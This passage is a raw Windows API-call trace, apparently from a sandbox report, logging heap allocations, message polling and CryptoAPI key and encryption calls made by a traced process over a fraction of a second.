RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd540 [0189.842] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0189.842] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0189.842] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2888 [0189.842] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0189.842] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0189.842] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0189.842] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0189.842] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0189.842] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deec0 [0189.842] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0189.842] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0189.842] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0189.842] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0189.842] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0189.843] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0189.843] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df190 [0189.843] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0189.843] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0189.843] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0189.843] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0189.843] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0189.843] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0189.843] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0189.843] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0189.843] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa548 [0189.843] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0189.843] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0189.843] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0189.843] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0189.843] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0189.843] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0189.843] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0189.843] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0189.843] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0189.843] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0189.843] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0189.843] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0189.843] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0189.843] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0189.844] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0189.844] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0189.844] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0189.844] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0189.844] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0189.844] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0189.844] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0189.844] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0189.844] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df190 | out: hHeap=0x8a0000) returned 1 [0189.844] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0189.844] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0189.844] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df190 [0189.844] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0189.844] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0189.844] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0189.844] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0189.844] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0189.844] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0189.844] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0189.844] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0189.844] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0189.844] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0189.844] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0189.844] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0189.845] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0189.845] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0189.845] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0189.845] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0189.845] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0189.845] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0189.845] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0189.845] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0189.845] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0189.845] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0189.845] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0189.845] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0189.845] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df190 | out: hHeap=0x8a0000) returned 1 [0189.845] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0189.845] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df190 [0189.845] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0189.845] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0189.845] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0189.845] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0189.845] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0189.845] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0189.845] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0189.845] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0189.845] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0189.846] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0189.846] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0189.846] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0189.846] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0189.846] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0189.846] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba618 [0189.846] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db408 [0189.846] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0189.846] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0189.846] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0189.846] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0189.846] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0189.846] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0189.846] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0189.846] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0189.846] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0189.846] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0189.850] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0189.850] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0189.850] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0189.850] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0189.850] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0189.850] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0189.850] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0189.850] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0189.850] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0189.850] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0189.850] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0189.850] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0189.850] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0189.850] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0189.850] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0189.850] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0189.850] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0189.850] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0189.850] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0189.850] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0189.850] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0189.851] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0189.851] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0189.851] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0189.851] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db408 [0189.851] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0189.851] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0189.851] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0189.851] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0189.851] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0189.851] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0189.851] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0189.851] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0189.851] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0189.851] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0189.851] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0189.851] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0189.851] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0189.851] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0189.851] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0189.851] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0189.851] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0189.851] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0189.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0189.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0189.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0189.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0189.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0189.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0189.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0189.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0189.852] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0189.852] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0189.852] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0189.852] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0189.852] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0189.852] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0189.852] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0189.852] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0189.852] CryptGetKeyParam (in: hKey=0x90af98, dwParam=0x7, pbData=0x9c2708, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c2708*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0189.852] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0189.852] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0189.853] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.853] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.853] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.853] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.853] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0189.853] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.853] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.853] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0189.853] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def60 | out: hHeap=0x8a0000) returned 1 [0189.853] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0189.853] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0189.853] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0189.853] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0189.853] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0189.853] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0189.853] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0189.853] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0189.853] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0189.853] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0189.853] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0189.854] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0189.854] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0189.854] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0189.854] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0189.854] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0189.854] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0189.854] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.854] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.854] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.854] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0189.854] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.854] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0189.854] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0189.854] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0189.854] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0189.855] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0189.855] CryptEncrypt (in: hKey=0x90af98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0x18b97, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0x18ba0) returned 1 [0189.855] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.855] CharLowerBuffW (in: lpsz="byte[101281]", cchLength=0xc | out: lpsz="byte[101281]") returned 0xc [0189.857] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0189.857] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0189.857] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0189.859] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0189.860] CryptEncrypt (in: hKey=0x90af98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xa90748*, pdwDataLen=0x87e820*=0x18b97, dwBufLen=0x18ba0 | out: pbData=0xa90748*, pdwDataLen=0x87e820*=0x18ba0) returned 1 [0189.863] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0189.863] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0189.863] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0189.863] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0189.863] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0189.863] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0189.863] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0189.863] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0189.863] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0189.892] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0189.892] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | 